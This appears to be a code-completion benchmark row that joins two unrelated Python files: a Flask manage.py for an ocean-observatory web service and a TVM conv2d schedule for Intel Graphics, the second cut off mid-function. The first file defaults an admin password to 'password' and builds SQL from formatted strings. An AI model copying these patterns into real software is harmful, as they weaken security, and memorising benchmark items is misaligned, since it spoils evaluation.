gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
#!/usr/bin/env python
'''
Application manager. Responsible for starting the service,
performing db migrations, testing.
'''
import os

basedir = os.path.abspath(os.path.dirname(__file__))

# Optional coverage instrumentation: started before the app package is
# imported so module-level code is measured too (see the test() command).
COV = None
if os.environ.get('FLASK_COVERAGE'):
    import coverage
    COV = coverage.coverage(branch=True, include=basedir + '/app/*')
    COV.start()

from ooiservices.app import create_app, db
from flask.ext.script import Manager, Shell, Server, prompt_bool
from flask.ext.migrate import Migrate, MigrateCommand
import flask.ext.whooshalchemy as whooshalchemy
from ooiservices.app.models import PlatformDeployment, User, UserScope, UserScopeLink, DisabledStreams
from datetime import datetime
import sqlalchemy.exc
import codecs
import yaml

# Load service configuration, preferring a local override when present.
# BUG FIX: os.path.join(basedir, '/app/config_local.yml') discarded basedir
# because the second component was absolute, so config_local.yml was never
# detected even when it existed; join the components relatively instead.
# Also use yaml.safe_load -- config files need no arbitrary-object support.
_local_cfg = os.path.join(basedir, 'app', 'config_local.yml')
if os.path.exists(_local_cfg):
    with open(_local_cfg, 'r') as f:
        doc = yaml.safe_load(f)
else:
    with open(os.path.join(basedir, 'app', 'config.yml'), 'r') as f:
        doc = yaml.safe_load(f)

env = doc['ENV_NAME']
app = create_app(env)
manager = Manager(app)
migrate = Migrate(app, db)

# Full-text search index for platform deployments.
app.config['WHOOSH_BASE'] = 'ooiservices/whoosh_index'
whooshalchemy.whoosh_index(app, PlatformDeployment)
##------------------------------------------------------------------
## M@Campbell 02/10/2015
##
## Helper function to build index of models that are loaded manually (from .sql file)
#
# Usage:
# From shell:
# > from ooiservices.manage import rebuild_index
# > rebuild_index(model_name)
##------------------------------------------------------------------
def rebuild_index(model):
    """Rebuild the Whoosh search index of a Flask-SQLAlchemy model.

    Intended for models whose rows were loaded manually (from a .sql file)
    and therefore never passed through the whooshalchemy event hooks.

    Usage (from a shell):
        > from ooiservices.manage import rebuild_index
        > rebuild_index(model_name)

    :param model: model class with ``__searchable__`` fields and a Whoosh
        index (e.g. PlatformDeployment).
    """
    # FIX: dropped the unused `import whoosh`; only flask_whooshalchemy is
    # actually referenced. Docstring moved to the top of the function so it
    # is recognized as the function's docstring.
    import flask_whooshalchemy
    app.logger.info("Rebuilding {0} index...".format(model.__name__))
    primary_field = model.pure_whoosh.primary_key_name
    searchables = model.__searchable__
    index_writer = flask_whooshalchemy.whoosh_index(app, model)
    # Fetch all data and re-index every row currently in the table.
    entries = model.query.all()
    entry_count = 0
    with index_writer.writer() as writer:
        for entry in entries:
            index_attrs = {}
            # Whoosh requires unicode values for indexed fields.
            for field in searchables:
                index_attrs[field] = unicode(getattr(entry, field))
            index_attrs[primary_field] = unicode(getattr(entry, primary_field))
            writer.update_document(**index_attrs)
            entry_count += 1
    app.logger.info("Rebuilt {0} {1} search index entries.".format(str(entry_count), model.__name__))
def make_shell_context():
    """Build the namespace exposed inside the ``shell`` manager command."""
    from ooiservices.app.models import User, UserScope, UserScopeLink, Array
    from ooiservices.app.models import PlatformDeployment, InstrumentDeployment, Stream, StreamParameter, Watch
    from ooiservices.app.models import OperatorEvent
    from ooiservices.app.models import Platformname, Instrumentname, Annotation, Organization
    from ooiservices.app.models import SystemEvent, SystemEventDefinition, UserEventNotification

    # Expose the app, the db session factory and every commonly-used model.
    return dict(
        app=app,
        db=db,
        User=User,
        UserScope=UserScope,
        UserScopeLink=UserScopeLink,
        Array=Array,
        PlatformDeployment=PlatformDeployment,
        InstrumentDeployment=InstrumentDeployment,
        Stream=Stream,
        Watch=Watch,
        OperatorEvent=OperatorEvent,
        StreamParameter=StreamParameter,
        Platformname=Platformname,
        Instrumentname=Instrumentname,
        Annotation=Annotation,
        Organization=Organization,
        SystemEvent=SystemEvent,
        SystemEventDefinition=SystemEventDefinition,
        UserEventNotification=UserEventNotification,
    )
@manager.command
def runserver():
    # Run the Flask development server on the host/port from the app config.
    app.run(host=app.config['HOST'], port=app.config['PORT'], debug=True)
# Register the interactive shell (namespace from make_shell_context) and the
# Flask-Migrate `db` sub-commands with the manager CLI.
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
@manager.command
def test(coverage=False, testmodule=None):
    """Run the unit tests.

    usage:
        python manage.py test
        python manage.py test --coverage
        python manage.py test --coverage --testmodule=test_basics.py

    :param coverage: when True, re-exec the interpreter with FLASK_COVERAGE
        set so the collector (COV) starts before the app package is imported.
    :param testmodule: optional test-file pattern; defaults to discovering
        every test under the ``tests`` directory.
    """
    import sys
    if coverage and not os.environ.get('FLASK_COVERAGE'):
        # Restart the process with coverage enabled so module-level imports
        # are measured as well; execvp never returns.
        os.environ['FLASK_COVERAGE'] = '1'
        os.execvp(sys.executable, [sys.executable] + sys.argv)
    if COV:
        COV.start()
    import unittest
    # Allow user to choose test module to run.
    # FIX: identity comparison with None (`is None`), not `== None`.
    if testmodule is None:
        tests = unittest.TestLoader().discover(start_dir='tests')
    else:
        tests = unittest.TestLoader().discover(start_dir='tests', pattern=testmodule)
    retval = unittest.TextTestRunner(verbosity=2).run(tests)
    if COV:
        COV.stop()
        COV.save()
        print('Coverage Summary:')
        COV.report()
        COV.erase()
    # Propagate any error or failure to the shell (e.g. for CI).
    if retval.errors or retval.failures:
        sys.exit(1)
@manager.option('--production', default=False)
@manager.option('-p', '--password', required=True)
@manager.option('-u', '--psqluser', default='postgres')
def deploy(password, production, psqluser):
    """Create and populate the PostgreSQL database(s) for the service.

    :param password: password for the default admin user that is created.
    :param production: when truthy, build the production database (ooiuiprod)
        instead of the dev/test pair (ooiuidev/ooiuitest).
    :param psqluser: postgres role used to run the psql commands.
    """
    from flask.ext.migrate import upgrade
    from ooiservices.app.models import User, UserScope, UserScopeLink, Array, Organization
    from ooiservices.app.models import PlatformDeployment, InstrumentDeployment, Stream, StreamParameterLink
    from sh import psql
    if production:
        app.logger.info('Creating PRODUCTION Database')
        try:
            # Best effort: the role may already exist.
            psql('-c', 'CREATE ROLE postgres LOGIN SUPERUSER')
        except:
            pass
        psql('-c', 'create database ooiuiprod;', '-U', psqluser)
        psql('ooiuiprod', '-c', 'create schema ooiui', '-U', psqluser)
        psql('ooiuiprod', '-c', 'create extension postgis', '-U', psqluser)
    else:
        try:
            # Best effort: the role may already exist.
            psql('-c', 'CREATE ROLE postgres LOGIN SUPERUSER')
        except:
            pass
        # Create the local database
        app.logger.info('Creating DEV and TEST Databases')
        psql('-c', 'create database ooiuidev;', '-U', psqluser)
        psql('ooiuidev', '-c', 'create schema ooiui', '-U', psqluser)
        psql('ooiuidev', '-c', 'create extension postgis', '-U', psqluser)
        # Create the local test database
        psql('-c', 'create database ooiuitest;', '-U', psqluser)
        psql('ooiuitest', '-c', 'create schema ooiui', '-U', psqluser)
        psql('ooiuitest', '-c', 'create extension postgis', '-U', psqluser)
    # Ensure all SQLAlchemy mappers are configured before creating tables.
    from sqlalchemy.orm.mapper import configure_mappers
    configure_mappers()
    db.create_all()
    if production:
        app.logger.info('Populating Production Database . . .')
        with open('db/ooiui_schema_data.sql') as f:
            psql('-U', psqluser, 'ooiuiprod', _in=f)
        with open('db/ooiui_params_streams_data.sql') as h:
            psql('-U', psqluser, 'ooiuiprod', _in=h)
        # with open('db/ooiui_vocab.sql') as i:
        #     psql('-U', psqluser, 'ooiuiprod', _in=i)
        app.logger.info('Production Database loaded.')
    else:
        app.logger.info('Populating Dev Database . . .')
        with open('db/ooiui_schema_data.sql') as f:
            psql('-U', psqluser, 'ooiuidev', _in=f)
        with open('db/ooiui_params_streams_data.sql') as h:
            psql('-U', psqluser, 'ooiuidev', _in=h)
        # with open('db/ooiui_vocab.sql') as i:
        #     psql('-U', psqluser, 'ooiuidev', _in=i)
        app.logger.info('Dev Database loaded.')
    # migrate database to latest revision
    # upgrade()
    if not os.getenv('TRAVIS'):
        # Seed scopes and a default admin account (skipped on Travis CI).
        UserScope.insert_scopes()
        app.logger.info('Insert default user, name: admin')
        User.insert_user(password=password)
        admin = User.query.first()
        admin.scopes.append(UserScope.query.filter_by(scope_name='user_admin').first())
        admin.scopes.append(UserScope.query.filter_by(scope_name='sys_admin').first())
        admin.scopes.append(UserScope.query.filter_by(scope_name='data_manager').first())
        admin.scopes.append(UserScope.query.filter_by(scope_name='redmine').first())
        db.session.add(admin)
        db.session.commit()
@manager.option('-s', '--schema', required=True)
@manager.option('-o', '--schema_owner', required=True)
@manager.option('-u', '--save_users', required=True)
@manager.option('-ds', '--save_disabled_streams', required=False)
@manager.option('-au', '--admin_username', required=False)
@manager.option('-ap', '--admin_password', required=False)
@manager.option('-af', '--first_name', required=False)
@manager.option('-al', '--last_name', required=False)
@manager.option('-ae', '--email', required=False)
@manager.option('-ao', '--org_name', required=False)
def rebuild_schema(schema, schema_owner, save_users, save_disabled_streams, admin_username, admin_password, first_name, last_name, email, org_name):
    """
    Creates the OOI UI Services schema based on models.py

    The existing schema (if any) is first renamed to <schema>_<timestamp> as
    a backup; users and disabled-streams rows can optionally be copied back
    from that backup. On an IntegrityError during the copy the backup is
    restored. NOTE(review): `schema`/`schema_owner` are interpolated into raw
    DDL -- this command must only be run with trusted operator input.

    :usage: python manage.py rebuild_schema --schema ooiui --schema_owner postgres --save_users False --save_disabled_streams True --admin_username admin --admin_password password --first_name Default --last_name Admin --email defaultadmin@ooi.rutgers.edu --org_name Rutgers
    :param schema:
    :param schema_owner:
    :return:
    """
    # Check if schema exists; timestamp tags the backup copy.
    timestamp = int((datetime.utcnow() - datetime(1970, 1, 1)).total_seconds())
    sql = "SELECT schema_name FROM information_schema.schemata WHERE schema_name = '{0}'".format(schema)
    sql_result = db.engine.execute(sql).first()
    if sql_result != None:
        # Move current schema to _timestamp
        app.logger.info('Backing up schema container {0} to {0}_{1}'.format(schema, timestamp))
        db.engine.execute('ALTER SCHEMA {0} RENAME TO {0}_{1}'.format(schema, timestamp))
    app.logger.info('Creating schema container: {0}'.format(schema))
    db.engine.execute('CREATE SCHEMA IF NOT EXISTS {0} AUTHORIZATION {1}'.format(schema, schema_owner))
    app.logger.info('Building schema objects')
    db.create_all()
    app.logger.info('Adding base user_scopes')
    UserScope.insert_scopes()
    db.session.commit()
    app.logger.info('Loading default data into database')
    load_data('ooiui_schema_data.sql')
    db.session.commit()
    app.logger.info('Loading params data into database')
    load_data(sql_file='ooiui_params_streams_data.sql')
    db.session.commit()
    # app.logger.info('Loading new vocab data into database')
    # load_data(sql_file='ooiui_vocab.sql')
    db.session.commit()
    if save_disabled_streams == 'True':
        # Copy disabledstreams rows over from the backup schema.
        app.logger.info('Re-populating disabledstreams table from backup schema')
        ds_sql = 'SELECT * FROM {0}_{1}.disabledstreams'.format(schema, timestamp)
        sql_result = db.engine.execute(ds_sql)
        fa = sql_result.fetchall()
        for sresult in fa:
            ds_record = DisabledStreams()
            ds_record.id = sresult.id
            ds_record.ref_des = getattr(sresult, 'ref_des', '')
            ds_record.stream_name = getattr(sresult, 'stream_name', '')
            ds_record.disabled_by = getattr(sresult, 'disabled_by', '')
            ds_record.timestamp = getattr(sresult, 'timestamp', '')
            db.session.add(ds_record)
            # Advance the sequence since ids are assigned explicitly.
            db.engine.execute("SELECT nextval('ooiui.disabledstreams_id_seq')")
        db.session.commit()
    if save_users == 'True':
        # Copy users (and their scope links) over from the backup schema.
        app.logger.info('Re-populating users from backup schema')
        users_sql = 'SELECT * FROM {0}_{1}.users'.format(schema, timestamp)
        sql_result = db.engine.execute(users_sql)
        fa = sql_result.fetchall()
        for sresult in fa:
            try:
                new_user = User()
                new_user.id = sresult.id
                new_user.user_id = getattr(sresult, 'user_id', '')
                # Older backups store the hash under `pass_hash`.
                if hasattr(sresult, 'pass_hash'):
                    new_user._password = getattr(sresult, 'pass_hash', '')
                else:
                    new_user._password = getattr(sresult, '_password', '')
                new_user.email = getattr(sresult, 'email', '')
                new_user.user_name = getattr(sresult, 'user_name', '')
                new_user.active = getattr(sresult, 'active', '')
                new_user.confirmed_at = getattr(sresult, 'confirmed_at', '')
                new_user.first_name = getattr(sresult, 'first_name', '')
                new_user.last_name = getattr(sresult, 'last_name', '')
                new_user.phone_primary = getattr(sresult, 'phone_primary', '')
                new_user.phone_alternate = getattr(sresult, 'phone_alternate', '')
                new_user.role = getattr(sresult, 'role', '')
                new_user.email_opt_in = getattr(sresult, 'email_opt_in', '')
                new_user.organization_id = getattr(sresult, 'organization_id', '')
                new_user.other_organization = getattr(sresult, 'other_organization', '')
                new_user.vocation = getattr(sresult, 'vocation', '')
                new_user.country = getattr(sresult, 'country', '')
                new_user.state = getattr(sresult, 'state', '')
                db.session.add(new_user)
                # Advance the sequence since ids are assigned explicitly.
                db.engine.execute("SELECT nextval('ooiui.users_id_seq')")
                db.session.commit()
            except sqlalchemy.exc.IntegrityError, exc:
                # Copy failed: park the half-built schema and restore backup.
                app.logger.info('Failure: rebuild_schema failed: ')
                reason = exc.message
                app.logger.info('Cause: ' + reason)
                app.logger.info('Restoring to previous version')
                app.logger.info('Restoring schema container {0}_{1} to {0}'.format(schema, timestamp))
                db.engine.execute('ALTER SCHEMA {0} RENAME TO {0}_{1}_failed'.format(schema, timestamp))
                db.engine.execute('ALTER SCHEMA {0}_{1} RENAME TO {0}'.format(schema, timestamp))
        user_scope_link_sql = 'SELECT * FROM {0}_{1}.user_scope_link'.format(schema, timestamp)
        sql_resultc = db.engine.execute(user_scope_link_sql)
        fac = sql_resultc.fetchall()
        for scresult in fac:
            try:
                new_user_scope_link = UserScopeLink()
                new_user_scope_link.id = scresult.id
                new_user_scope_link.user_id = scresult.user_id
                new_user_scope_link.scope_id = scresult.scope_id
                db.session.add(new_user_scope_link)
                # Advance the sequence since ids are assigned explicitly.
                db.engine.execute("SELECT nextval('ooiui.user_scope_link_id_seq')")
                db.session.commit()
            except sqlalchemy.exc.IntegrityError, exc:
                # Same restore-on-failure dance as for users above.
                app.logger.info('Failure: rebuild_schema failed: ')
                reason = exc.message
                app.logger.info('Cause: ' + reason)
                app.logger.info('Restoring to previous version')
                app.logger.info('Restoring schema container {0}_{1} to {0}'.format(schema, timestamp))
                db.engine.execute('ALTER SCHEMA {0} RENAME TO {0}_{1}_failed'.format(schema, timestamp))
                db.engine.execute('ALTER SCHEMA {0}_{1} RENAME TO {0}'.format(schema, timestamp))
        # db.engine.execute('INSERT INTO {0}.users SELECT * FROM {0}_{1}.users'.format(schema, timestamp))
        # db.engine.execute('INSERT INTO {0}.user_scope_link SELECT * FROM {0}_{1}.user_scope_link'.format(schema, timestamp))
    else:
        # No users preserved: create a default admin, filling in defaults
        # for any option the operator did not supply.
        app.logger.info('Adding the default admin user')
        if admin_username is None:
            app.logger.info('Admin username set to: admin')
            admin_username = 'admin@ooi.rutgers.edu'
        if admin_password is None:
            app.logger.info('Admin password set to: password')
            admin_password = 'password'
        if first_name is None:
            app.logger.info('Admin first_name set to: Default')
            first_name = 'Default'
        if last_name is None:
            app.logger.info('Admin last_name set to: Admin')
            last_name = 'Admin'
        if email is None:
            app.logger.info('Admin email set to: defaultadmin@ooi.rutgers.edu')
            email = 'admin@ooi.rutgers.edu'
        if org_name is None:
            app.logger.info('Admin org_name set to: Rutgers')
            org_name = 'Rutgers'
        add_admin_user(username=admin_username, password=admin_password, first_name=first_name, last_name=last_name, email=email, org_name=org_name)
@manager.option('-u', '--username', required=True)
@manager.option('-p', '--password', required=True)
@manager.option('-f', '--first_name', required=True)
@manager.option('-l', '--last_name', required=True)
@manager.option('-e', '--email', required=True)
@manager.option('-o', '--org_name', required=True)
def add_admin_user(username, password, first_name, last_name, email, org_name):
    '''
    Creates a 'user_admin' scoped user using the supplied username and password.
    The account is additionally granted the sys_admin, data_manager and
    redmine scopes.
    :param username:
    :param password:
    :return:
    '''
    app.logger.info('Insert user_name: %s' % username)
    User.insert_user(username=username, password=password, first_name=first_name,
                     last_name=last_name, email=email, org_name=org_name)
    admin = User.query.filter_by(user_name=username).first()
    # Grant every administrative scope to the new account.
    for scope_name in ('user_admin', 'sys_admin', 'data_manager', 'redmine'):
        admin.scopes.append(UserScope.query.filter_by(scope_name=scope_name).first())
    db.session.add(admin)
    db.session.commit()
@manager.command
def load_data(sql_file):
    '''
    Bulk loads the OOI UI data from a SQL file in the top-level ``db``
    directory (sibling of the application directory).
    :param sql_file: file name (not path) of the SQL script to execute.
    :return:
    '''
    APP_ROOT = os.path.dirname(os.path.abspath(__file__))  # refers to application_top
    APP_DB = os.path.join(APP_ROOT, '..', 'db')
    with codecs.open(os.path.join(APP_DB, sql_file), "r", "utf-8") as f:
        try:
            from ooiservices.app.models import __schema__
            # Make unqualified table names in the script resolve to our schema.
            db.session.execute("SET search_path = {0}, public, pg_catalog;".format(__schema__))
            db.session.execute(f.read())
            db.session.commit()
            app.logger.info('Success: Bulk data loaded from file: ' + sql_file)
        except sqlalchemy.exc.IntegrityError as exc:
            # FIX: `except X as exc` (valid in py2.6+ and py3) instead of the
            # py2-only `except X, exc`; str(exc) instead of the deprecated
            # .message attribute.
            app.logger.info('Failure: Bulk data NOT loaded from file: ' + sql_file)
            app.logger.info('Cause: ' + str(exc))
@manager.command
def profile(length=25, profile_dir=None):
    """Start the application under the code profiler.

    :param length: number of top calls printed per request.
    :param profile_dir: when given, .prof files are written there instead.
    """
    from werkzeug.contrib.profiler import ProfilerMiddleware
    # Wrap the WSGI app so every request is profiled.
    app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[length],
                                      profile_dir=profile_dir)
    app.run()
@manager.command
def destroy():
    """Drop the prod/dev/test databases after interactive confirmation.

    FIX: removed the stray @staticmethod decorator -- this is a module-level
    function, not a method, and wrapping it in a staticmethod descriptor
    makes the module attribute non-callable under Python 2. Also switched to
    the print() function form, valid in both Python 2 and 3.
    """
    from sh import psql
    db_check = str(db.engine)
    if prompt_bool(
        "Are you sure you want to do drop %s" % db_check
    ):
        # Each drop is best-effort: a missing database is reported, not fatal.
        try:
            psql('-c', 'drop database ooiuiprod', '-U', 'postgres')
        except:
            print('prod db not found')
        try:
            psql('-c', 'drop database ooiuidev', '-U', 'postgres')
        except:
            print('dev db not found')
        try:
            psql('-c', 'drop database ooiuitest', '-U', 'postgres')
        except:
            print('test db not found')
        app.logger.info('Databases have been dropped.')
# Entry point: dispatch to the Flask-Script manager CLI.
if __name__ == '__main__':
    manager.run()
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,unused-variable,unused-argument,no-else-return, too-many-arguments, too-many-locals, too-many-statements, no-member, too-many-branches, too-many-boolean-expressions
"""conv2d schedule on Intel Graphics"""
from __future__ import absolute_import as _abs
import tvm
from .. import generic
from .. import util
from .. import tag
from ..nn import pad
from ..nn.conv2d import conv2d, conv2d_NCHWc, conv2d_alter_layout, _get_workload
from ..nn.util import get_pad_tuple
from ..util import simplify
##### SCHEDULE UTILITIES #####
def tile_and_bind3d(s, tensor, z, y, x, z_factor=2, y_factor=None, x_factor=None):
    """Tile three axes of *tensor* and bind them to GPU blocks/threads.

    Unspecified factors cascade: y defaults to z's factor, x to y's.
    Returns the innermost x axis and the three thread axes so callers can
    reuse the same thread bindings on other stages.
    """
    y_factor = y_factor or z_factor
    x_factor = x_factor or y_factor

    z_outer, z_inner = s[tensor].split(z, z_factor)
    y_outer, y_inner = s[tensor].split(y, y_factor)
    x_outer, x_inner = s[tensor].split(x, x_factor)
    s[tensor].reorder(z_outer, y_outer, x_outer, z_inner, y_inner, x_inner)

    thread_z = tvm.thread_axis((0, z_factor), "threadIdx.z")
    thread_y = tvm.thread_axis((0, y_factor), "threadIdx.y")
    thread_x = tvm.thread_axis((0, x_factor), "threadIdx.x")

    # Outer axes map to blocks, inner axes to threads.
    bindings = (
        (z_outer, tvm.thread_axis("blockIdx.z")),
        (z_inner, thread_z),
        (y_outer, tvm.thread_axis("blockIdx.y")),
        (y_inner, thread_y),
        (x_outer, tvm.thread_axis("blockIdx.x")),
        (x_inner, thread_x),
    )
    for axis, thread in bindings:
        s[tensor].bind(axis, thread)
    return x_inner, thread_z, thread_y, thread_x
@conv2d_alter_layout.register(["intel_graphics"])
def _alter_conv2d_layout(attrs, inputs, tinfos, F):
    """Rewrite conv2d to the NCHWc variant with an OIHW%do kernel layout.

    :param attrs: operator attributes (padding/strides/kernel_layout, ...).
    :param inputs: symbolic inputs of the conv2d op.
    :param tinfos: placeholder tensors describing input shapes/dtypes.
    :param F: frontend op namespace (nnvm.symbol or tvm.relay.op).
    """
    copy_inputs = [s for s in inputs]
    data = tinfos[0]
    kernel = tinfos[1]
    import ast
    # attrs values are stringified; literal_eval recovers tuples/ints.
    padding = ast.literal_eval(str(attrs['padding']))
    stride = ast.literal_eval(str(attrs['strides']))
    wkl = _get_workload(data, kernel, stride, padding, data.dtype)
    oc_bn = 1
    kernel_shape = util.get_const_tuple(kernel.shape)
    # Pick the largest output-channel block size (<=16) that divides the
    # number of filters; falls through to 1 if none divides evenly.
    for oc_bn in range(16, 1, -1):
        if kernel_shape[0] % oc_bn == 0:
            break
    new_attrs = {k: attrs[k] for k in attrs.keys()}
    new_attrs["kernel_layout"] = 'OIHW%do' % (oc_bn)
    if F.__name__ == 'tvm.relay.op':
        # Derive channels for frontends (e.g ONNX) that miss "channel" field.
        new_attrs["channels"] = inputs[1].checked_type.shape[attrs['kernel_layout'].index('O')]
    if F.__name__ == 'nnvm.symbol':
        out = F.contrib.conv2d_NCHWc(*copy_inputs, **new_attrs)
    else:
        out = F.nn.contrib_conv2d_nchwc(*copy_inputs, **new_attrs)
    return out
@conv2d_NCHWc.register(["intel_graphics"])
def _decl_conv2d(data, kernel, stride, padding, dilation, layout, out_layout, out_dtype='float32'):
    """Conv2D operator for Intel Graphics backend.

    Parameters
    ----------
    data : tvm.Tensor
        4-D with shape [batch, in_channel, in_height, in_width]
    kernel : tvm.Tensor
        5-D with shape [num_filter, in_channel, filter_height, filter_width, nnum_filter_vec]
    stride : int or a list/tuple of two ints
        stride size, or [stride_height, stride_width]
    padding : int or a list/tuple of two ints
        padding size, or [pad_height, pad_width]
    layout : str
        layout of data

    Returns
    -------
    output : tvm.Tensor
        4-D with shape [batch, out_channel, out_height, out_width]
    """
    assert data.shape[0].value == 1, "only support batch size=1 convolution on intel gpu"
    assert data.dtype == kernel.dtype, "Do not support inputs with different data types now."
    # The output dtype always follows the input dtype; the out_dtype argument
    # is ignored (kept for interface compatibility).
    out_dtype = data.dtype
    # FIX: removed dead locals (HPAD/WPAD from get_pad_tuple, kernel_shape,
    # HSTR/WSTR) that were computed and never used -- padding and stride are
    # normalized inside _decl_cl_spatialpack_NCHWc.
    return _decl_cl_spatialpack_NCHWc(data, kernel, stride, padding, out_dtype)
@generic.schedule_conv2d_NCHWc.register(["intel_graphics"])
def schedule_conv2d_NCHWc(outs):
    """Schedule for conv2d_nchw for Intel Graphics

    Parameters
    ----------
    outs: Array of Tensor
        The computation graph description of conv2d_nchw
        in the format of an array of tensors.

    Returns
    -------
    s: Schedule
        The computation schedule for conv2d_nchw.
    """
    outs = [outs] if isinstance(outs, tvm.tensor.Tensor) else outs
    s = tvm.create_schedule([x.op for x in outs])
    scheduled_ops = []

    def traverse(op):
        """inline all one-to-one-mapping operators except the last stage (output)"""
        if tag.is_broadcast(op.tag):
            if op not in s.outputs:
                s[op].compute_inline()
            for tensor in op.input_tensors:
                # Recurse into producers that have not been visited yet;
                # placeholder ops (no inputs) are skipped.
                if tensor.op.input_tensors and tensor.op not in scheduled_ops:
                    traverse(tensor.op)
        if 'conv2d' in op.tag:
            _schedule_cl_spatialpack_NCHWc(s, op)
        scheduled_ops.append(op)

    traverse(outs[0].op)
    return s
def _decl_cl_spatialpack_NCHWc(data, kernel, stride, padding, out_dtype='float16'):
    """Declare the spatial-pack conv2d compute for an NCHWc-packed kernel.

    data is 4-D NCHW; kernel is 5-D (filter_chunk, in_channel, kh, kw, nv)
    with nv filters packed per chunk. Returns the unpacked 4-D NCHW output
    tensor tagged 'conv2d' (which the schedule dispatches on).
    """
    batch, in_channel, in_height, in_width = [util.get_const_int(x) for x in data.shape]
    num_filter, channel, kernel_h, kernel_w, nv = [util.get_const_int(x) for x in kernel.shape]
    num_filter = num_filter * nv
    pad_top, pad_left, pad_down, pad_right = get_pad_tuple(padding, kernel)
    if isinstance(stride, (tuple, list)):
        stride_h, stride_w = stride
    else:
        stride_h, stride_w = stride, stride
    out_channel = num_filter
    out_height = simplify((in_height - kernel_h + pad_top + pad_down) // stride_h + 1)
    out_width = simplify((in_width - kernel_w + pad_left + pad_right) // stride_w + 1)
    oshape = (batch, out_channel, out_height, out_width)
    rc = tvm.reduce_axis((0, in_channel), name='rc')
    ry = tvm.reduce_axis((0, kernel_h), name='ry')
    rx = tvm.reduce_axis((0, kernel_w), name='rx')
    # Output tile sizes (block_h x block_w) per workload class; these magic
    # numbers are presumably hand-tuned for Intel Graphics -- confirm.
    block_w = 1
    block_h = 1
    if stride_h == 2:
        if num_filter + kernel_h == 515:
            block_h = 4
            block_w = 4
        else:
            block_h = 4
            block_w = 5
    elif kernel_h == 3:
        if num_filter == 512:
            block_h = 2
            block_w = 7
        else:
            block_h = 2
            block_w = 14
    elif kernel_h == 7 and padding == 3 and stride == 1:
        block_h = 3
        block_w = 4
    else:
        block_h = 1
        block_w = 16
    # The tile sizes are handed to the schedule via op attrs.
    attrs = {'block_h': block_h, 'block_w' : block_w}
    # Round the compute extent up to a whole number of blocks.
    c_h = out_height
    c_w = out_width
    if not out_height % block_h == 0:
        c_h = (out_height // block_h + 1) * block_h
    if not out_width % block_w == 0:
        c_w = (out_width // block_w + 1) * block_w
    # Pad beyond the normal conv padding so every block reads valid data.
    pad_before = [0, 0, pad_top, pad_left]
    pad_after = [0, 0, pad_down + c_h - block_h, pad_right + c_w - block_w]
    temp = pad(data, pad_before, pad_after, name="pad_temp")
    cshape = (batch, out_channel // nv, c_h, c_w, nv)
    conv = tvm.compute(
        cshape,
        lambda nn, ff, yy, xx, vc:\
            tvm.sum(
                temp[nn, rc, yy * stride_h + ry, xx * stride_w + rx].astype(out_dtype) *
                kernel[ff, rc, ry, rx, vc].astype(out_dtype),
                axis=[rc, ry, rx]), name='conv', attrs=attrs)
    # Unpack the NCHWc accumulation buffer back to NCHW.
    output = tvm.compute(
        oshape,
        lambda nn, ff, yy, xx:
            conv[nn][ff//nv][yy][xx][ff%nv],
        name='output_unpack', tag='conv2d')
    return output
def _schedule_cl_spatialpack_NCHWc(s, op):
    """Schedule the NCHWc spatial-pack conv2d compute.

    `op` is the 'output_unpack' stage; its producer chain is
    conv <- (pad_temp, packed kernel).
    """
    output = op.output(0)
    _, _, out_height, out_width = [util.get_const_int(x) for x in output.shape]
    conv = op.input_tensors[0]
    temp = s[conv].op.input_tensors[0]
    kernel = s[conv].op.input_tensors[1]
    # Cache padded input per-warp and accumulate conv locally; the kernel is
    # staged through a local cache feeding the local accumulator.
    temp_W = s.cache_read(temp, "warp", [conv])
    conv_L = s.cache_write(conv, "local")
    kernel_L = s.cache_read(kernel, "local", [conv_L])
    _, in_channel, temp_h, temp_w = [util.get_const_int(x) for x in temp.shape]
    # Tile sizes chosen by _decl_cl_spatialpack_NCHWc.
    attrs = s[conv].op.attrs
    OUTPUT_BLOCK_HEIGHT = attrs['block_h']
    OUTPUT_BLOCK_WIDTH = attrs['block_w']
    # schedule conv
    z_factor = 1
    y_factor = 1
    x_factor = 16
    thread_z = tvm.thread_axis((0, z_factor), "threadIdx.z")
    thread_y = tvm.thread_axis((0, y_factor), "threadIdx.y")
    thread_x = tvm.thread_axis((0, x_factor), "threadIdx.x")
    _, co, oh, ow, vc = s[conv].op.axis
    ooh, ioh = s[conv].split(oh, factor=OUTPUT_BLOCK_HEIGHT)
    oow, iow = s[conv].split(ow, factor=OUTPUT_BLOCK_WIDTH)
    s[conv].reorder(_, co, ooh, oow, vc, ioh, iow)
    coo, coi = s[conv].split(co, nparts=1)
    ooho, oohi = s[conv].split(ooh, factor=z_factor)
    oowo, oowi = s[conv].split(oow, factor=y_factor)
    vco, vci = s[conv].split(vc, factor=x_factor)
    s[conv].reorder(_, coo, vco, ooho, oowo, coi, oohi, oowi, vci, ioh, iow)
    s[conv].bind(oohi, thread_z)
    s[conv].bind(oowi, thread_y)
    s[conv].bind(vci, thread_x)
    s[conv].bind(ooho, tvm.thread_axis("blockIdx.z"))
    s[conv].bind(oowo, tvm.thread_axis("blockIdx.y"))
    s[conv].bind(coi, tvm.thread_axis("blockIdx.x"))
    # schedule conv_L
    s[conv_L].compute_at(s[conv], vci)
    i, oc, h, w, vc = s[conv_L].op.axis
    rc, ry, rx = s[conv_L].op.reduce_axis
    s[conv_L].reorder(i, oc, rc, ry, rx, vc, h, w)
    s[temp_W].compute_at(s[conv_L], rc)
    # Unroll the kernel-window loops except for the 7-wide case.
    if kernel.shape[3].value != 7:
        s[conv_L].unroll(ry)
        s[conv_L].unroll(rx)
    # schedule temp
    _, ci, h, w = s[temp].op.axis
    tile_and_bind3d(s, temp, ci, h, w, 1, 16, 16)
    # schedule temp_W
    _, ci, h, w = s[temp_W].op.axis
    zo, zi = s[temp_W].split(ci, 1)
    yo, yi = s[temp_W].split(h, 1)
    xo, xi = s[temp_W].split(w, 16)
    s[temp_W].reorder(zo, yo, xo, zi, yi, xi)
